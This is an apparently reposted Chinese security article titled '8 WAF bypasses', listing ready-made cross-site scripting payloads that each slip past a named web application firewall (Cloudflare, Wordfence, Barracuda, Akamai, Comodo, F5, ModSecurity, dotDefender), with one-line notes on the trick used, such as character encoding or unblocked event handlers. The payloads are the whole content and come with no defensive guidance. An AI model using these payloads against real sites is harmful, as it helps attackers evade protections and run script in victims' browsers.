8个WAF绕过
2022-8-4 08:52:55 Author: 哆啦安全(查看原文) 阅读量:32 收藏

名称: Cloudflare
有效负载: 
<a"/onclick=(confirm)()>click
绕过技术:非空白填充

名称: Wordfence
负载: 
<a/href=javascript&colon;alert()>click
绕过技术:数字字符编码

名称:Barracuda
有效载荷: 
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click
绕过技术:数字字符编码

名称: Akamai
负载: 
<d3v/onauxclick=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: Comodo
有效负载: 
<d3v/onauxclick=(((confirm)))``>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: F5
负载: 
<d3v/onmouseleave=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: ModSecurity
负载: 
<details/open/ontoggle=alert()>
绕过技术:黑名单中缺少标签(事件处理程序?)

名称: dotdefender
负载: 
<details/open/ontoggle=(confirm)()//
绕过技术:黑名单中缺少标签、函数调用混淆和备用标签结尾

Web安全攻防实战零基础速成培训班


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NzUzNzk1Mw==&mid=2247493504&idx=2&sn=66f6cf9025081a7294003e0303ac7a62&chksm=ceb8a2cef9cf2bd807a91221e7f292269a731fc1fe5e2827187b769c4e57c643ae792c75f752#rd
如有侵权请联系:admin#unsafe.sh